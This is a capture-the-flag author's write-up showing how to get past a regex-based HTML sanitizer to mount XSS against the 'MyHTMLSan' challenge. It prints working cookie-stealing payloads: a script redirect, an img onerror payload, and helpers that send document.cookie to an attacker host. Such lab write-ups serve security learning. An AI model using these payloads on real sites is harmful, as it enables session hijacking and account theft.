This is the author’s writeup for the MyHTMLSan challenge in the web category.
It describes the solution I intended when I made the challenge.
Challenge description #
LiveOverflow inspired me to host html files, I hope I made them safe enough.
There was no source code for this challenge, only a link to the website.
My Notes #
- This was meant to be an easy challenge.
- The inspiration for the challenge came from LiveOverflow’s video on HTML Specification.
- Source Code can be found here.
- I could have locked it down further with a blacklist, or by setting the headless browser to not follow redirects.
Notes to future self when setting up this challenge. #
- Spend more time to check for unexpected solutions
The Website #
When we first visit the website, we are greeted with a simple page containing a form where a user can submit their HTML code. We also see an embedded LiveOverflow video explaining the HTML specification.
After submitting our HTML code, we are greeted with a page that shows us the output of our HTML code (if any). There is also a Report to admin button that we can use to report this link.
The submission location uses a UUID to prevent users from guessing the location of other submissions.
Looking at the question #
As you can see from the image above, normal text is not sanitized by the page. Let us try some HTML tags.
Submitting <h1>test</h1>, we see the following output.
We can see from the above that the h1 tags were stripped.
To complete this challenge, we will have to find some sort of XSS vulnerability within the website and get the admin to visit the page that exploits it.
Finding the XSS vulnerability #
Another hint that we have yet to look into is the embedded LiveOverflow video.
In it, he specifically mentions that an opening < followed by a number (i.e. [0-9]) is not counted as an HTML tag and will be rewritten.
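The rule can be sketched in a few lines. This is a simplified illustration of the "tag open" decision in the HTML tokenizer, not a full parser: it ignores comments and doctypes, the helper name opensTag is hypothetical, and the inputs are my own illustrative strings rather than the ones from the video.

```javascript
// Simplified sketch of the HTML tokenizer's "tag open" decision.
// `opensTag` is a hypothetical helper, not part of the challenge.
function opensTag(text) {
  if (text[0] !== "<") return false;
  const next = text[1] ?? "";
  // A start tag needs an ASCII letter right after "<".
  if (/[A-Za-z]/.test(next)) return true;
  // "</" followed by an ASCII letter opens an end tag.
  if (next === "/") return /[A-Za-z]/.test(text[2] ?? "");
  // Anything else (a digit, a space, ...) leaves "<" as plain text.
  return false;
}

console.log(opensTag("<h1>"));   // true
console.log(opensTag("</h1>"));  // true
console.log(opensTag("<3 you")); // false
```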
Let us try the example that he gave in the question,
We can see from the image that this too was stripped from the output.
Hmm… maybe there was something else in the video that hints at the answer for this question.
Towards the end of the video, he talks about how HTML cannot be parsed using regex. He then shows us an example of a regex that he found online that can
Perhaps the sanitizer is built on a regex.
Regex from the video #
The post that he mentioned in the video here
The main regex that was shown is <(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>, which is used to match HTML tags.
However, there are some issues with this regex.
It does not match any tag that is missing its closing > (i.e. <br instead of <br>).
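A minimal sketch of this weakness, assuming the sanitizer simply deletes every match of the regex above. The sanitize function is hypothetical and may differ from the challenge's actual code; the global flag is added so that every match is removed.

```javascript
// The regex quoted in this writeup, with the global flag added.
const TAG_REGEX = /<(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>/g;

// Hypothetical sanitizer: assumed behaviour, not the challenge's real code.
function sanitize(html) {
  return html.replace(TAG_REGEX, "");
}

console.log(sanitize("<h1>test</h1>")); // test
console.log(sanitize("<h1 test"));      // <h1 test
```

The second input has no > anywhere, so the regex can never complete a match and the string passes through untouched.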
Let us try it out on the website.
For the above result, we submitted the payload <h1 without the closing >.
As the rendered output shows, the h1 tag was not sanitized.
The solution #
Script Payload #
With the payload above, it was shown correctly as a script tag on the page.
However, the Chrome browser blocked the loading of the script.
This is due to a Chrome feature that blocks cross-origin reads (Cross-Origin Read Blocking); for more information, you can visit the link above.
TLDR: Chrome blocks the loading of scripts from other domains which are not of content type
Thus, to make it work, we will have to make use of tools like
Over here we can edit the payload that appears when someone visits our website.
Now that we can trigger an alert, we can simply change the script to a redirect request before reporting the page to the admin to get the flag.
document.location.href = "<your site here>?cookie=" + document.cookie;
We can simply redirect to the page that we want with the admin’s cookie and retrieve the flag.
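The redirect and the receiving side can be sketched as follows. The collector URL, both function names and the cookie value are hypothetical placeholders. Unlike the one-liner above, this sketch URL-encodes the cookie, which is an addition of mine so that characters such as & or # cannot truncate the query string.

```javascript
// Hypothetical collector endpoint; replace with a server you control.
const COLLECTOR = "https://attacker.example/collect";

// Build the redirect target, URL-encoding the cookie so that characters
// such as ";", "=" and spaces survive inside the query string.
function buildExfilUrl(base, cookie) {
  return base + "?cookie=" + encodeURIComponent(cookie);
}

// On the receiving side, recover the cookie from the requested URL.
function readCookieParam(requestUrl) {
  return new URL(requestUrl).searchParams.get("cookie");
}

// Example cookie value, made up for illustration only.
const url = buildExfilUrl(COLLECTOR, "flag=example; session=abc");
console.log(url);
console.log(readCookieParam(url)); // flag=example; session=abc
```

In the browser, the payload would then be document.location.href = buildExfilUrl(COLLECTOR, document.cookie).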
Img Payload #
There is also an alternative using the img tag.
<img src="aa" onerror="document.location.href='<site here>?cookies='+document.cookie"
This will have the same effect as the script tag above (and is faster).
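To see why the img payload is submitted without its final >, here is a small check against the regex from the video, again assuming the sanitizer just removes every match. The collector URL is a hypothetical placeholder.

```javascript
// The regex quoted in this writeup, with the global flag added.
const TAG_REGEX = /<(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>/g;

// Hypothetical collector URL used only for illustration.
const collector = "https://attacker.example/collect";

// The same payload with and without the closing ">".
const closed = `<img src="aa" onerror="document.location.href='${collector}?cookies='+document.cookie">`;
const unclosed = closed.slice(0, -1);

console.log(closed.replace(TAG_REGEX, "") === "");         // true: the whole tag is stripped
console.log(unclosed.replace(TAG_REGEX, "") === unclosed); // true: the payload survives
```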